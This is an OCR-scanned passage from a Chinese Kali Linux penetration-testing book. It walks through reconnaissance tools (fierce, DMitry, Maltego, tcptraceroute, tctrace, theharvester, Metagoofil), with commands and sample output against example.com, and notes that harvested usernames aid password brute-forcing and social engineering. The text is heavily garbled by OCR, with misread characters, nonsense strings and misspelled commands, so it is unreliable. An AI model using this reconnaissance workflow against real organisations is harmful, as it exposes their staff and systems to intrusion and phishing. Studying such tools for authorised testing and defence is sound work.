举例 来 说 ， 我 们 可 使 用 fierce 查 找 某 个 域 的 有 关 信 息 。 

# fierce -dns example.com -threads 3 

该 指令 返回 的 结果 如 下 。 


DNS Servers for targetdomain.com: 





ns4.example.com 
ns1.example.com 
ns2.example.com 
ns3.example.com 
Trying zone transfer first... 
Testing ns4.example.com 
Request timed out or transfer not allowed. 
Testing ns1.example.com 
Request timed out or transfer not allowed. 
Testing ns2.example.com 
Request timed out or transfer not allowed. 
Testing ns3.example.com 


Request timed out or transfer not allowed. 


Unsuccessful in zone transfer (it was worth a shot) 

Okay, trying the good old fashioned way... brute force 

Checking for wildcard DNS... 

Nope. Good. 

Now performing 1895 test(s)... 

192.168.116.3  voips.example.com 

192.168.116.7 ns.example.com 

192.168.116.19  streaming.example.com 

192.168.117.50  dev.example.com 

192.168.117.16  mx1.example.com 

192.168.117.17  mx2.example.com 

192.168.117.18 mx3.example.com 

192.168.117.16 imap.example.com 

192.168.117.5 www.example.com 

192.168.117.6  intra.example.com 

192.168.117.17 mail.example.com 

192.168.117.5  web.example.com 

192.168.117.16  webmail.example.com 

Subnets found (may want to probe here using nmap or unicornscan): 
192.168.73.0-255 : 2 hostnames found. 
192.168.46.0-255 : 1 hostnames found. 
192.168.116.0-255 : 34 hostnames found. 
192.168.117.0-255 : 25 hostnames found. 

Done with Fierce scan: http://ha.ckers.org/fierce/ 

Found 62 entries. 


Have a nice day. 


fierce 进 行 DNS 枚 举 的 耗 时 可 能 会 比较 长 。 


上 述 篇 幅 介 绍 了 搜索 茶 个 域 的 主机 名 称 的 多 种 方法 。 您 可 能 会 对 主 
机 名 的 作用 产生 疑问 。 在 渗透 测试 项 目 里 ， 只 要 能 够 在 DNS 分 析 阶 段 找 
到 主机 名 称 ， 就 可 以 对 该 主机 进行 测试 。 


4.3.6 DMitr 


DMitry (Deep Magic Information Gathering Tool) 属于 多 功能 的 信 
Bue TA. EWS AA EB SU aN: 

e 根据 IP 地 址 《或 域名 ) 来 查询 目标 主机 的 whois 信息 ; 

e 在 Netcraft.com 的 网 站 上 挖掘 主机 信息 ; 

e 查找 日 标 域 中 用 的 子 域 ; 

e 查找 日 标 域 的 电子 邮件 地 址 ; 

e 探测 目标 主机 上 打开 的 端口 、 被 屏蔽 的 端口 和 关闭 的 端口 。 

尽管 Kali Linux 中 的 很 多 工具 都 可 以 部 分 获取 这 些 信息 ， 但 是 
DMitry 更 为 方便 。 它 整合 了 这 些 工 具 ， 能 够 在 同一 个 报告 里 记录 多 种 
工具 才能 获取 到 的 所 有 信息 。 

实际 上 DMitry 不 仅 具 有 DNS 分 析 功 能 ， 还 有 路 由 分 析 功 能 。 但 是 
我 们 认为 这 个 工具 更 侧重 与 DNS 分 析 ， 所 以 把 它 归 到 了 DNS 类 工具 。 

如 需 通 过 图 形 界面 启动 DMitry， 可 通过 菜单 依次 选中 
Applications|KaliLinux|Information Gathering | OSINTAnalysis | dmitry。 您 
也 可 以 在 终端 窗口 里 通过 下 述 指令 局 动 它 。 

# dmitry 

本 例 将 使 用 DMitry 程 序 依次 完成 下 述 任务 : 

e 进行 whois 查询 ; 

e 从 Netcraft.com 的 网 站 上 收集 相关 信息 ; 

e 搜索 所 有 可 能 的 子 域 ; 

e 搜索 所 有 可 能 的 电子 邮件 地 址 。 

下 面 这 个 指令 即 可 完成 全 部 上 述 功能 。 

















# dmitry -iwnse targethost 

该 指令 的 返回 结果 如 下 。 

Deepmagic Information Gathering Tool 

"There be some deep magic going on" 
HostIP:192.168.XX.XX 

HostName:targethost 

Gathered Netcraft information for targethost 
Retrieving Netcraft.com information for targethost 
No uptime reports available for host: targethost 
Gathered Subdomain information for targethost 
Searching Google.com:80... 
HostName:targethost 

HostIP:192.168.xx.xx 
HostName:www.ecom.targethost 
HostIP:192.168.xx.xx 
HostName:blogs.targethost 
HostIP:192.168.xx.xx 
HostName:static.targethost 
HostIP:192.168.xx.xx 
HostName:webmail.targethost 
HostIP:192.168.xx.xx 


Gathered E-Mail information for targethost 


Found 0 E-Mail(s) for host targethost, Searched 0 pages containing 0 


results 
DMitry 程 序 还 可 以 作 简 单 的 问 口 扫描 ， 上 所 需 指 令 如 下 。 
# dmitry -p targethost -f -b 
扫描 结果 如 下 。 
Deepmagic Information Gathering Tool 
"There be some deep magic going on" 
HostIP:192.168.xx.xx 
HostName:targethost 
Gathered TCP Port information for 192.168.xx.xx 
Port State 


80/tcp open 


135/tcp filtered 

136/tcp filtered 

137/tcp filtered 

138/tcp filtered 

139/tcp filtered 

Portscan Finished: Scanned 150 ports, 138 ports were in state closed 

从 上 述 的 扫描 结果 可 以 看 出 ，targethost 使 用 了 某 种 包 过 滤 设 备 。 它 
只 人 允许 连接 到 该 主机 的 80 端 口 ， 这 个 端口 通 冲 由 Web 服 务 器 占用 。 

4.3.7 Maltego 

Maltego 是 开源 的 情报 收集 程序 和 法 证 调查 程序 。 它 能 够 以 一 种 人 
性 化 的 方式 挖掘 、 收 集 并 整理 信息 。Maltego 的 开源 意味 着 它 从 公开 的 
资源 里 收集 信息 。 在 收集 信息 之 后 ， 您 可 使 用 Maltego 标 注 各 种 信息 之 
间 的 关联 。 





Maltego 能 够 以 图 形 化 的 方式 显示 数据 之 间 的 关联 。 在 分 析 信 息 片 
段 各 方面 的 共同 性 时 ， 这 种 可 视 化 功能 可 使 工作 变 得 简单 。 

Maltego 可 以 收集 以 下 几 种 网 络 信息 : 

o 域名 ; 

e DNS 名 ; 

e whois 信息 ; 

e 网 段 ; 

e IP 地 址 。 

它 还 可 以 用 来 收集 与 人 有 关 的 信息 ， 例 如 : 

e 某 人 所 在 公司 或 所 在 组 织 ; 

e 与 某 人 有 关 的 E-mail 地 址 ; 

e E AUR IRI sus s 

e 与 某 人 有 关 的 社交 网 站 ; 

e 与 某 人 有 关 的 电话 号 人 码 。 

Kali Linux 目 带 的 Maltego 应 当 是 Maltego 3.3.0 Kali Linux 版 。 这 属 
于 社区 版 本 ， 它 存在 一 些 功能 上 的 限制 。 详 细 的 限制 可 参见 
http://www.paterva.com/web5/client/community.php。 简 而 言 之 ， 这 种 版 
本 限制 分 为 : 

e 不 可 用 于 商业 用 途 ; 

e 每 次 转换 (transform) 最 多 返回 转换 结果 中 的 12 项 ; 

e 用 户 需要 先 在 官方 网 站 上 注册 ， 才 能 使 用 客户 庙 程序 ; 

e API key 有 效 期 仅 为 数 天 ; 

e 它 与 社区 版 的 其 他 用 户 共享 一 台 性 能 并 不 出 色 的 服务 器 ; 

e 客户 端 和 服务 器 端的 通信 和 是 不 加 密 的 ; 

e 只 能 升级 到 主要 发 行 版 ; 

e 没有 客户 文 持 ; 

e 服务 器 端的 转换 功能 不 会 更 新 。 














Maltego 具 有 70 多 种 转换 功能 。 所 谓 转换 (transform) 就 是 信息 收 
集 的 一 个 阶段 。Maltego 每 做 一 次 转换 就 是 在 做 一 个 阶段 的 信息 收集 工 
fes 

如 需 使 用 “Maltego， 可 在 图 形 菜 单 里 依次 选中 Kali Linux | 
Information Gathering |OSINTAnalysis | maltego， 或 者 在 终端 中 使 用 下 述 
指令 。 

# maltego 

而 后 您 将 看 到 它 的 欢迎 信息 《〈 见 图 4.4) 。 数 秒 钟 之 后 ， 程 序 会 局 
动 Maltego 设 置 向 导 ， 以 帮助 您 在 第 一 次 运行 它 的 时 候 进 行 客户 端 设 
Be 





Welcome to Maltego! 


Steps Startup wizard - Welcome (1 of 5) 


. Welcome 
Login Welcome to Maltego! 
Login result 
Selecttransform seeds This wizard will guide you through the steps of setting up your 
Update transforms Maltego Client for first use 


We hope that you enjoy using our product as much as we enjoy 
building it! 


Please note that the Community Edition is intended for 
non-commercial use only! 


ALTEGO RADIUM CE 
ALI LINUX 








图 4.4 
点 击 Next 后 进入 图 4.5 所 示 的 界面 。 





Welcome to Maltego! 


Steps Startup wizard - Login (2 of 5) 


. Login 





Welcome Enter your details below to log in to the Maltego Community Server 

pene Or if you have not done so yet, register here 

Selecttransform seeds 

Update transforms Login 
T 


* Email Address 


Password 


once 


PS 


* Solve captcha 


ALTEGO RADIUM CE 
ALI LINUX 





Cancel 


图 4.5 
此 时 您 需要 输入 登录 Maltego 社 区 的 账号 信息 。 如 果 您 没有 社区 账 
可 点 击 register here 链 接 ， 在 官方 网 站 上 进行 注册 。 
注册 页 面 如 图 4.6 所 示 。 





| @ htt paterva.com t te ~e By a ^ n 


Welcome to the Maltego version 3 community edition page, nere you will be able to register an account that you can use with the NEW community edition! 


Register 


Register an account today for free! 





Firstname 





Lastname 


Organisation 





Email Address 


Password 





Password Con'irmason 


Captcha 














图 4.6 
在 空白 处 填写 相关 信息 之 后 ， 点 击 Register! 按钮 完成 注册 。 
如 果 您 有 Maltego 账 号 ， 在 程序 里 输入 正确 的 登录 信息 就 可 进入 图 
4.7 所 示 的 界面 。 








Welcome to Maltego! 


Startup wizard - Login result (3 of 5) 


Hello Tedi, welcome to Maltego Community Edition! 


l 


jir 
Login result 
Select transform seeds Personal details 
Update transforms 

~ First name 


3. 
4 


Surname 


Email address 
Your API key is valid until May 22, 2013 at 12:00:00 AM WIT 


ALTEGO RADIUM CE 


ALI LINUX 
Cancel 





图 4.7 
接 下 来 要 设置 Maltego 转 换 的 种 子 (seed) ， 如 图 4.8 所 示 。 





Welcome to Maltegol 


Startup wizard - Select transform seeds (4 of 5) 


Discover transforms from 


Lo gin result 
. Select transform seeds v | Maltego public servers 
Update transforms 

"t 


Local TAS (Transform Application Server) 


Note: The transform seed settings can be changed later through 
Manage-»Discover Transforms 
ALTEGO RADIUM CE 

ALI LINUX 





一 一 : — 
图 4.8 
此 后 Maltego 客 户 端 程序 会 连接 Maltego 服 务 器 ， 以 获取 转换 所 需 的 
童 息 。 如 果 上 述 设 置 都 设置 正确 ， 您 将 看 到 图 4.9 所 示 的 界面 。 











Welcome to Maltegol 


Startup wizard - Update transforms (5 of 5) 


Login Ready...Set...GO! 
Login result 
4. Select transform seeds Your new Maltego client has been initialized sucessfully! 
5. Update transforms 
pi 


2 new application server(s) were found 
48 new transforms were found 


51 new entities were installed 


You are now ready to use Maltego! 
€) Run a machine (NEWI!) 
Open a blank graph and let me play around 
Open an example graph 
Go away, | have done this before! 


ALTEGO RADIUM CE 
ALI LINUX 











图 4.9 
如 果 出 现 了 上 述 界 面 ， 就 说 明 Maltego 成 功 完 成 了 初始 化 操作 。 您 
现在 就 可 以 使 用 Maltego 客 户 端 程序 。 
在 介绍 Maltego 的 各 种 使 用 方法 之 前 ， 我 们 先 熟 悉 一 下 程序 的 界面 
〈 见 图 4.10) 。 








图 4.10 

程序 窗口 的 左上 角 是 Palette (fei) 窗口 。 您 可 以 在 这 个 窗口 
里 选择 不 同 实 体 (entity〉 类 型 的 对 象 目标 。Maltego 的 实体 类 型 分 为 6 
组 。 

e ict (Device) : 例如 电话 、 照 相机 。 

e 基础 设施 〈Infrastructure) : 例如 AS. DNS 名 称 、 域 名 、IPv4 
地 址 、MX 记录 、NS 记 录 、 网 段 、URL 和 网 站 。 

e 地 点 (Locations) : 例如 地 球 。 

e SiN (Penetration testing) : 采用 各 种 技术 的 测试 项 目 。 

e ^ A (Personal) : 别名 、 文 件 、E-mail 地 址 、 图 像 、 人 物 、 电 
话 号 码 和 短语 。 

e 社交 网 络 (Social Network) : 包括 Facebook 和 Twitter 实体 、 好 

图 4.10 顶 部 的 中 间 部 分 ， 分 别 是 Main View“〈 主 视 网 ) ~ Bubble 
View〔 气 泡 图 ) 和 Entity List (实体 清 单 )。 分 析 人 员 应 该 在 大 图 里 标 
注 数据 之 间 的 各 种 关系 ， 而 他 们 可 在 这 三 种 视图 里 查看 那些 在 大 图 中 不 
明显 的 信息 。Main View 是 常规 工作 视图 ，Bubble View 把 信息 节点 显示 














为 气泡 ， 而 Entity List 则 把 节点 显示 为 文本 。 

在 视图 劳 边 的 几 个 图 表 分 别 代表 不 同 的 布局 算法 〈]layout 
algorithm) . Maltego 文 持 4 种 布局 算法 。 

e 块 状 布局 (Block layout) : 信息 挖掘 的 默认 布局 。 

e 分 层 布 局 (Hierarchical layout) : 类 似 文件 管理 占 的 树 状 布局 。 

e 中 心 布局 (Centrality layout) : 靠近 中 心 的 节点 围绕 中 心 进行 分 
布 ， 其 他 节点 分 散在 四 周 。 

e 紧凑 布局 (Organic layout) : WATERS eA, ASR 
与 其 他 节点 之 间 的 距离 尽量 保持 最 短 。 

熟悉 过 程序 界面 之 后 ， 我 们 开始 演示 它 的 功能 。 

本 文 以 example.com 为 例 ， 演 示 收 集 某 个 域 的 信息 的 其 体 方法 。 

我 们 首先 使 用 快捷 键 (Ctrl-T) 创建 新 的 工作 图 (graph) . 在 
Palette 标 签 里 选 Infrastructure， 然 后 点 击 Domain, EX% Jt E)E 
口 。 如 果 操 作成 功 ， 您 将 在 主 窗口 里 看 到 名 为 paterva.com 的 域 对 象 。 双 
击 这 个 名 称 ， 把 它 重 新 命名 为 目标 域 ， 在 本 例 中 ， 我 们 给 它 重 命名 为 


example.com. 
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图 4.11 
右键 点 击 这 个 域名 ， 可 看 到 可 以 应 用 的 转换 操作 : 
e DNS from domain 〈 获 取 DNS 信息 ) ; 
e Domain owner's details 〈 域 注册 人 信息 ) ; 
e E-mail addresses from domain (E-mail 地 址 ) ; 
e Other transforms〈 其 他 转换 ， 包 括 To Person. To Phone 
numbers, To Website) ; 





e Files and documents from domain 〈 文 档 操 作 ) ; 

e All transforms (AAMA FEH) 。 

我 们 在 菜单 里 选中 Run Transform | Other Transforms | Domain To 
DNS NameSchema, Fetai 4.129. 

进行 DNS from domain 转 换 后 ， 可 收集 网 站 地 址 和 该 域 有 关 的 DNS 
Bo 

您 还 可 以 进行 其 他 转换 。 

如 果 您 要 更 改 测试 对 象 为 其 他 域 ， 应 当 保 存 当前 工作 图 。 保 存 工作 


图 的 具体 方法 是 ， 扣 击 Maltego 图 标 ， 然 后 选择 Save。 工 作 图 将 个 以 








Maltego 工 作 图 的 格式 保存 为 .mtgx 文 件 。 然 后 ， 可 双击 现 有 的 域 对 象 ， 
更 改 域名 。 
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图 4.12 
下 一 节 将 介绍 几 个 收集 路 由 信息 的 程序 。 


4.4 £ uk 


获取 网 络 路 由 信息 的 工具 各 种 各 样 ， 本 章 将 介绍 几 种 常用 工具 。 网 
络 路 由 信息 可 以 帮助 测试 人 员 了 解 自 己 的 主机 到 目标 主机 之 间 的 网 络 通 
信 路 径 ， 进 而 理解 目标 主机 的 网 络 情况 。 保 护 目 标 主 机 的 防火 墙 信息 ， 
往往 也 暗藏 于 路 由 信息 里 

本 节 将 介绍 几 款 用 于 获取 路 由 信息 的 工具 。 


4.4.1 tcptraceroute 











tcptraceroute 是 traceroute 程 序 的 补充 工具 。 传 统 的 traceroute 程 序 在 
其 发 送 的 UDP 或 ICMP echo 数据 包 里 ， 设 置 有 特定 的 TIL (Time To 
Live) 标志 位 。 它 把 TTL 的 值 从 1 开始 递增 ， 直到 数据 包 到 达 目 标 主机 为 


止 。 而 tcptraceroute 则 是 使 用 TCP 数 据 包 进 行 测试 ， 它 利用 TCP SYN GE 
手 请 求 ) 数据 包 进 行路 由 信息 探测 。 

相 比 其 他 程序 ，tcptraceroute ”的 优点 在 于 其 较 高 的 通过 紊 。 如 果 在 
渗透 测试 人 员 和 目标 主机 之 间 的 防火 墙 禁止 traceroute 数 据 通 过 ， 那 么 
traceroute 指 令 束 完全 发 挥 不 了 作用 。 但 是 只 要 防火 墙 允 许 访问 目标 主机 
的 特定 TCP 端 口 ， 就 可 以 使 用 tcptraceroute 程 序 穿 过 防火 墙 到 测试 目标 主 
机 。 

在 使 用 tcptraceroute 时 ， 如 果 相 应 的 目标 端口 是 开放 的 (open) ， 
程序 将 会 收 到 SYN/ACK 数 据 包 ， 而 如 宁 目 标 端口 是 关闭 的 ， 那 么 它 会 
收 到 一 个 RST 数 据 包 。 

要 使 用 tcptraceroute， 只 需 在 终端 里 使 用 下 述 指令 。 

# tcptracaroute 

这 条 指令 会 在 屏幕 上 提示 tcptraceroute 的 使 用 方法 。 

现在 我 们 来 演示 它 的 用 法 。 

我 们 使 用 下 述 指令 以 获取 本 机 与 example.com 主 机 之 间 的 路 由 信 


CI 


# traceroute www.example.com 
该 指令 的 返回 结果 如 下 。 
traceroute to www.example.com (192.168.10.100), 30 hops max, 40 
byte packets 
1 192.168.1.1 (192.168.1.1) 8.382 ms 12.681 ms 24.169 ms 
2 1.static.192.168.xx.xx.isp (192.168.2.1) 47.276 ms 61.215 ms 
61.057 ms 
J k k k 
4 74.subnet192.168.xx.xx.isp (192.168.4.1) 68.794 ms 76.895 ms 
94.154 ms 
5 isp2 (192.168.5.1) 122.919 ms 124.968 ms 132.380 ms 


15 * * * 


30 * k * 

在 第 15 个 结果 之 后 ， 就 再 也 没有 返回 任何 路 由 信息 了 。 这 征 
为 eee 数据 包 被 网 络 里 的 包 过 滤 设 备 屏 珊 了 。 

下 面 我 们 来 使 用 tcptraceroute。 假 如 我 们 事先 知道 目标 主机 为 Web 服 
务 器 开放 了 TCP 协 议 的 80 端 口 ， 那 么 就 可 以 使 用 下 述 指 令 。 

# tcptraceroute www.example.com 

返回 的 结果 如 下 。 

Selected device eth0, address 192.168.1.107, port 41884 for outgoing 
packets 


58 


Tracing the path to www.example.com (192.168.10.100) on TCP port 

80 

(www), 30 hops max 

1 192.168.1.1 55.332 ms 6.087 ms 3.256 ms 

2 1.static.192.168.xx.xx.isp (192.168.2.1) 66.497 ms 50.436 

ms 85.326 ms 

Qoo 

4 74.subnet192.168.xx.xx.isp (192.168.4.1) 56.252 ms 28.041 ms 

34.607 ms 

5 isp2 (192.168.5.1) 51.160 ms 54.382 ms 150.168 ms 

6 192.168.6.1 106.216 ms 105.319 ms 130.462 ms 

7 192.168.7.1 140.752 ms 254.555 ms 106.610 ms 


14 192.168.14.1 453.829 ms 404.907 ms 420.745 ms 
15 192.168.15.1 615.886 ms 474.649 ms 432.609 ms 


16 192.168.16.1 [open] 521.673 ms 474.778 ms 820.607 ms 
这 一 次 ， 我 们 的 数据 包 成 功 到 达 了 目标 主机 ， 并 且 给 出 了 测试 机 与 
目标 主机 之 间 的 完整 路 由 信息 。 


4.4.2 tctrace 


我 们 同样 可 以 选用 tctrace 程序 分 析 路 由 信息 。 这 个 程序 通过 回 目 标 
主机 发 送 TCP SYN 数 据 包 来 获取 相应 信息 。 
如 需 使 用 tctrace 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 
# tctrace -i<device> -d<targethost> 
参数 中 的 <device> 指 的 是 网 卡 接 口 ，<targethost> 则 是 被 测试 的 目标 
EW 
例如 ， 我 们 可 以 使 用 下 述 指令 获取 本 机 和 www.example.com 之 间 的 
路 由 信息 。 
# tctrace -i ethO -d www.example.com 
该 指令 的 返回 结果 如 下 。 
1(1) [192.168.1.1] 
2(1) [192.168.2.1] 
3(all) Timeout 
4(3) [192.168.4.1] 
5(1) [192.168.5.1] 
6(1) [192.168.6.1] 
7(1) [192.168.7.1] 





14(1) [192.168.14.1] 
15(1) [192.168.15.1] 
16(1) [192.168.16.1] (reached; open) 
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Kali Linux 中 的 搜索 引擎 类 工具 可 以 使 用 搜索 引擎 获取 目标 主机 的 
域名 信息 、 电 子 邮 件 信息 ， 以 及 文件 的 元 数据 (metadata) 信息 。 这 些 
工具 被动 收集 的 工作 方式 也 正 是 它们 的 优势 所 在 。 如 果 您 无 法 访问 目标 
主机 上 的 网 站 ， 不 妨 利 用 搜索 引擎 间接 访问 。 就 其 结果 而 言 ， 目 标 主机 
不 会 知道 您 具体 进行 了 哪些 操作 。 


4.5.1 theharvester 


theharvester 能 够 收集 电子 邮件 账号 、 用 户 名 和 主机 名 / 子 域名 信息 。 
它 通 过 数 个 公共 资源 搜索 所 需 的 信息 。2.2 版 theharvester 用 到 的 公开 资源 
如 下 所 示 。 

e 谷歌 〈Google) 

e Ù (Bing) 

e PGP 


e Linkedin 








e Yandex 

e People123 

e Jigsaw 

e Shodan 

如 需 在 Kali Linux 中 使 用 theharvester， 可 在 终端 中 使 用 如 下 指令 。 

# theharvester 

程序 会 在 屏幕 上 提示 该 工具 的 使 用 方法 。 

例如 ， 如 果 想 从 谷歌 的 前 100 项 搜索 结果 里 挖掘 目标 域 里 的 电子 邮 
件 地 址 和 主机 名 ， 可 使 用 下 述 指令 。 

# theharvester -d example.com -] 100 -b google 

程序 搜索 到 的 E-mail 地 址 和 主机 名 如 下 。 


[-] Searching in Google: 
Searching 0 results... 

[+] Emails found: 

info@example.com 

user1@example.com 

user2@example.com 

user3@example.com 

[+] Hosts found in search engines: 

192.168.118.14:sd1.example.com 

192.168.118.14:sd2.example.com 

192.168.118.14:event.example.com 

192.168.118.14:test.example.com 

203.34.118.7:nms.example.com 

上 述 结果 里 含有 多 个 E-mail 地 址 和 数 个 主机 名 ， 这 都 是 theharvester 

通过 Google 搜 索引 擎 收集 到 的 信息 。 

如 果 需 要 收集 其 他 信息 ， 例 如 用 户 名 等 信息 ， 我 们 可 以 指定 程序 使 
用 linkedin.com。 具 体 指令 如 下 。 

# theharvester -d example.com -] 100 -b linkedin 

该 指令 的 返回 结果 如 下 。 


[-] Searching in Linkedin.. 





Searching 100 results.. 
Users from Linkedin: 
userl 
user2 


user3 


user4 

user5 

user6 

Total results: 6 

从 Linkedin.com 网 站 上 搜索 到 的 目标 域 的 用 户 名 ， 将 在 后 期 的 渗透 
测试 阶段 发 挥 作 用 。 如 果 测 试 人 员 要 发 起 社会 工程 学 攻击 之 类 的 渗透 ， 


就 会 需要 这 些 信息 。 


4.5.2 Metagoofil 

Metagoofil 通 过 谷歌 引擎 搜 索 目 标 域 的 文件 的 元 数据 信息 
(metadata) 。 目 前 ， 它 文 持 的 文件 格式 有 : 

e Word 文档 (.docx、.doc) ; 

e 表格 文件 C.xlsx. .xls. .ods) ; 

e 演示 文档 (pptx, .ppt. .odp) ; 

e PDF 文件 CpdD 。 

在 获取 元 数据 信息 时 ，Metagoofil 的 内 部 操作 过 程 大 体 如 下 : 

e 使 用 Google 引擎 在 目标 域内 搜索 指定 的 文件 类 型 ; 

e 把 搜索 到 的 文档 保存 到 本 地 磁盘 ; 

e 从 下 载 的 文件 中 解析 元 数据 信息 ; 

e 把 元 数据 信息 的 分 析 结 果 保 存 为 HTML 文件 。 

我 们 可 以 在 元 数据 信息 里 找到 的 信息 有 : 

e 用 户 名 ; 

e 软件 版 本 ; 

e 服务 器 名 或 机 器 名 。 

渗透 测试 的 后 期 阶段 可 能 会 用 到 这 些 信息 。 

要 访问 Metagoofil， 在 终端 中 执行 如 下 命令 : 


# metagoofil 





这 将 显示 该 命令 的 使 用 方法 和 示例 。 
我 们 通过 一 个 例子 进行 详细 的 用 法 说 明 。 现 在 ， 我们 要 从 目标 域 
(-d example.com) 里 搜索 DOC 文件 和 PDF 文件 C-t .doc, .ipdf) ， 并 保 
存 到 test 目录 里 〈-o test) 。 对 于 每 种 类 型 的 文件 ， 我 们 都 要 收集 20 个 
(-1 20) 。 我 们 希望 这 个 程序 只 下 载 5 个 文件 (-n 5) ， 并 将 最 终 处 理 
结果 保存 为 testhtml Cf test.html) 。 结 合 以 上 参数 ， 我 们 应 当 使 用 的 指 
令 如 下 。 
# metagoofil -d example.com -l 20 -t doc,pdf —n 5 -f test.html -o test 
该 指令 的 返回 结果 如 下 。 


[-] Starting online search... 





[-] Searching for doc files, with a limit of 200 

Searching 100 results... 

Searching 200 results... 
Results: 191 files found 
Starting to download 5 of them: 
[1/5] /support/websearch/bin/answer.py?answer-186645 & amp;%20 
form=bb & amp;hl=en 
Error downloading /support/websearch/bin/answer. 
py?answer-186645 & amp;%20form=bb & amp;hl=en 
[2/5] http://www.example.com/documents/customerevidence/27402_ 
Cakewalk_final.do 
[3/5] http:// www.example.com/documents/customerevidence/5588 _ 
marksspencer.doc 
[4/5] http:// www.example.com/documents/uk/Ladbrokes.doc 
[5/5] http:// www.example.com/~Gray/papers/PITAC_Interim_Report 

8 98.doc 


[-] Searching for pdf files, with a limit of 200 
Searching 100 results... 
Searching 200 results... 
Results: 202 files found 
Starting to download 5 of them: 
[1/5] /support/websearch/bin/answer.py?answer=186645 & amp;%20 
form=bb & amp;hl=en 
Error downloading /support/websearch/bin/answer. 
py?answer-186645 & amp;%20form=bb & amp;hl=en 
[2/5] http:// www.example.com/pubs/77954/s1021801 .pdf 
[3/5] http:// www.example.com/pubs/152133/deepconvexnetwork 
interspeech201 1-pub.pdf 
[x] Error in the parsing process 
[4/5] http:// www.example.com/en-us/collaboration/papers/uruguay. pdf 
[5/5] http:// www.example.com/pubs/6361 1/2002-droppo-icslpb.pdf 
[+] List of users found: 
Benjamin Van Houten 
Marketing 
IT 
May Yee 
sarah condon 
clarel 
Jim Gray 


[+] List of software found: 


Microsoft Office Word 

Microsoft Word 10.0 

Microsoft Word 9.0 

Microsoft Word 8.0 

Acrobat Distiller 5.0.5 (Windows) 

Adobe PDF Library 8.0 

Adobe InDesign CS3 (5.0.2) 

[+] List of paths and servers found: 

‘Macintosh HD:Temporary Items:AutoRecovery save of Congressio' 

'NCO Server:Staff (NCO Staff): Yolanda Comedy:IR22July:IR10Aug' 

'C:\jim\HPCC\PACIT_Report_8_98.doc' 

[+] List of e-mails found: 

gzweig@mail.example.com 

程序 找到 了 很 多 文件 ， 并 从 中 收集 到 了 大 量 诸如 用 户 名 和 文件 路 径 
的 信息 。 我 们 可 以 通过 这 些 用 户 名 穷 举 目标 域 里 的 用 户 名 ， 进 而 使 用 字 
典 骏 力 破 解 〈 在 目标 域 中 存在 的 ) 用 户 名 的 密码 。 需 要 小 心 的 是 ， 如 果 
对 目标 域 里 的 用 户 名 进行 暴力 破解 ， 可 能 会 造成 账号 锁定 的 情况 。 此 
外 ， 我 们 可 以 根据 路 径 信息 推测 目标 主机 的 操作 系统 。 可 见 ， 我 们 完全 
可 以 在 不 直接 访问 目标 域 的 网 址 的 情况 下 获取 上 述 信息 。 

Metagoofil 能 够 以 报告 格式 生成 汇总 信息 。 例 如 ， 知 把 报告 文件 储 
存 为 HTML 格式 文件 ， 我 们 可 看 到 图 4.13 所 示 的 内 容 。 


























| SSeS ss 
[Usernames || Software || Emal || Paths/Servers | 


User names found: 


e Benjamin Van Houten 
e Marketing 

e IT 

e May Yee 

e sarah condon 

e clarel 

e Jim Gray 


Software versions found: 


e Microsoft Office Word 
Microsoft Word 10.0 
Microsoft Word 9.0 
Microsoft Word 8.0 
Acrobat Distiller 5.0.5 (Windows) 
Causal Productions Pty Ltd 
Adobe PDF Library 8.0 
Adobe InDesign CS3 (5.0.2) 





图 4.13 


这 个 报告 含有 目标 域 的 用 户 名 、 软 件 厂 本 、E-mail 地 址 和 服务 噩 信 
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本 章 介绍 了 信息 收集 阶段 的 渗透 测试 工作 。 这 个 阶段 的 工作 通常 是 
渗透 测试 里 最 先进 行 的 工作 。 在 这 个 阶段 ， 我 们 要 尽 可 能 地 收集 目标 组 
织 的 信息 。 越 是 了 解 测试 目标 ， 测 试 的 工作 束 越 是 容易 。 著 名 的 《孙子 
Fak) WA: 

知己 知 彼 ， 百 战 百 胜 。 

这 句 话 揭示 了 渗透 测试 领域 的 奥秘 。 

本 章 介 绍 了 Kali Linux 里 的 信息 收集 工具 。 本 章 首先 介 绍 了 通过 公 
开 网 站 收集 目标 单位 信息 的 方法 ， 而 后 介绍 了 使 用 软件 获取 域 注册 信息 
的 方法 ， 还 介绍 了 可 收集 路 由 信息 的 工具 ， 以 及 利用 搜索 引擎 来 收集 信 
息 的 工具 。 

下 一 章 我 们 将 介绍 目标 识别 。 
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Kali Linux 的 很 多 工具 都 可 用 于 在 目标 网 络 里 发 现 、 识 别 主机 。 本 
章 将 介绍 这 些 软件 的 使 用 方法 。 这 部 分 内 容 分 为 以 下 几 个 主题 : 

e 目标 识别 过 程 的 简介 ; 

e 使 用 Kali Linux 的 工具 识别 目标 主机 的 方法 ; 

e 鉴定 目标 主机 操作 系统 的 方法 〈 操 作 系 统 指 纹 识别 )。 

为 了 更 容易 地 理解 这 些 概念 ， 我 们 将 使 用 一 个 虚拟 网 络 作为 目标 网 


在 利用 第 三 方 工具 〈 如 搜索 引擎 ) 获取 目标 网 络 的 信息 之 后 ， 接 下 
来 承 要 识 列 出 目标 系统 里 联网 的 主机 。 这 阶段 的 主要 目标 如 下 。 

e 在 目标 网 络 里 搜索 在 线 的 主机 。 如 果 某 台 主 机 不 在 线 ， 我 们 就 无 
法 对 其 进行 渗透 测试 ， 此 时 就 需要 另 找 一 台 在 线 的 主机 进行 渗透 测试 。 

e 鉴定 目标 机 器 上 安装 的 操作 系统 。 

获取 这 些 信息 有 助 于 后 期 漏洞 映射 阶段 的 工作 。 

我 们 使 用 Kali linux 系统 里 的 工具 进行 目标 识别 。 蝎 面 菜 单 中 的 
Information Gathering 收 录 了 绝 大 多 数 的 目标 识别 工具 。 本 文 只 需要 关注 
其 下 的 两 个 子 菜 单 里 的 程序 : 

e Identify Live Hosts (识别 在 线 主 机 )〉; 

e OS Fingerprinting (识别 操作 系统 ) 。 

本 和 章 从 这 两 个 类 别 的 诸多 程序 中 依照 其 功能 、 认 可 度 、 开 发 活跃 
度 ， 选 择 性 地 介绍 、 演 示 几 球 工 具 。 














5.2 i Al H tr 3 


T 3Identify Live Hosts 下 的 工具 可 用 于 判断 目标 主机 是 否 可 被 测 
试 人 员 访 问 。 在 开展 识别 阶段 的 工作 之 前 ， 我 们 需要 仔细 查看 我 们 与 客 
户 达 成 的 协议 和 服务 条 球 。 如 有 果 服 务 协 议 要 求 我 们 隐匿 渗透 测试 的 行 
为 ， 我 们 就 要 进行 相应 的 隐藏 测试 。 另 外 ， 在 测试 入 侵 监 测 系统 和 入 侵 
